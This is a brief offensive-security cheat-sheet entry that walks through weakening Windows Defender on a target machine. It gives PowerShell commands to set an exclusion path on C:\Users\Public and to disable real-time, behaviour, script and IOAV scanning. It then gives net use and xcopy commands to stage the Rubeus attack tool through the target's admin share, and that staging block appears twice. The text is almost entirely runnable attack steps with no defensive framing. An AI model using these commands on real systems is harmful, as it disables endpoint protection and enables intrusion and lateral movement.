ExclusionPath on DefenderIt is possible to define an exclusion path on the Defender so as to make that path a good foothold for any malicious files to be uploaded to the target machine:
Get-MpPreference | select ExclusionPath
Set-MpPreference -ExclusionPath "C:\\Users\\Public"
Now map drive, copy tools and unmap drive:
net use x: \\\\<target>\\c$
echo F | xcopy.exe C:\\Tools\\Rubeus.exe x:\\Users\\Public\\
net use x: /D
Get current status of Windows Defender:
Get-MpPreference | select DisableBehaviorMonitoring,DisableRealtimeMonitoring,DisableScriptScanning,DisableIOAVProtection
Disable it:
Set-MpPreference -DisableRealtimeMonitoring $true -DisableIOAVProtection $true -DisableBehaviorMonitoring $true -DisableScriptScanning $true -verbose
Now map drive, copy tools and unmap drive:
net use x: \\\\<target>\\c$
echo F | xcopy.exe C:\\Tools\\Rubeus.exe x:\\Users\\Public\\
net use x: /D